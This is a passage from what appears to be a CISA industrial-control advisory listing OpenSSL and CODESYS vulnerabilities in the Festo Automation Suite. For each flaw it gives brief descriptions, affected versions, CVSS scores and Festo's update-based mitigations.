<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/426.html">CWE-426 Untrusted Search Path</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2017-3735</a></h3>
<div class="csaf-accordion-content">
<p>While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2017-3735">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/119.html">CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2018-0739</a></h3>
<div class="csaf-accordion-content">
<p>Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2018-0739">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/674.html">CWE-674 Uncontrolled Recursion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2018-10612</a></h3>
<div class="csaf-accordion-content">
<p>In 3S-Smart Software Solutions GmbH CODESYS Control V3 products prior to version 3.5.14.0, user access management and communication encryption is not enabled by default, which could allow an attacker access to the device and sensitive information, including user credentials.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2018-10612">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/284.html">CWE-284 Improper Access Control</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2018-20025</a></h3>
<div class="csaf-accordion-content">
<p>Use of Insufficiently Random Values exists in CODESYS V3 products versions prior V3.5.14.0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2018-20025">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/330.html">CWE-330 Use of Insufficiently Random Values</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2018-20026</a></h3>
<div class="csaf-accordion-content">
<p>Improper Communication Address Filtering exists in CODESYS V3 products versions prior V3.5.14.0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2018-20026">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/923.html">CWE-923 Improper Restriction of Communication Channel to Intended Endpoints</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-13532</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS V3 web server, all versions prior to 3.5.14.10, allows an attacker to send specially crafted http or https requests which may allow access to files outside the restricted working directory of the controller.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-13532">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-13538</a></h3>
<div class="csaf-accordion-content">
<p>3S-Smart Software Solutions GmbH CODESYS V3 Library Manager, all versions prior to 3.5.16.0, allows the system to display active library content without checking its validity, which may allow the contents of manipulated libraries to be displayed or executed. The issue also exists for source libraries, but 3S-Smart Software Solutions GmbH strongly recommends distributing compiled libraries only.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-13538">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.6</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-13542</a></h3>
<div class="csaf-accordion-content">
<p>3S-Smart Software Solutions GmbH CODESYS V3 OPC UA Server, all versions 3.5.11.0 to 3.5.15.0, allows an attacker to send crafted requests from a trusted OPC UA client that cause a NULL pointer dereference, which may trigger a denial-of-service condition.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-13542">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
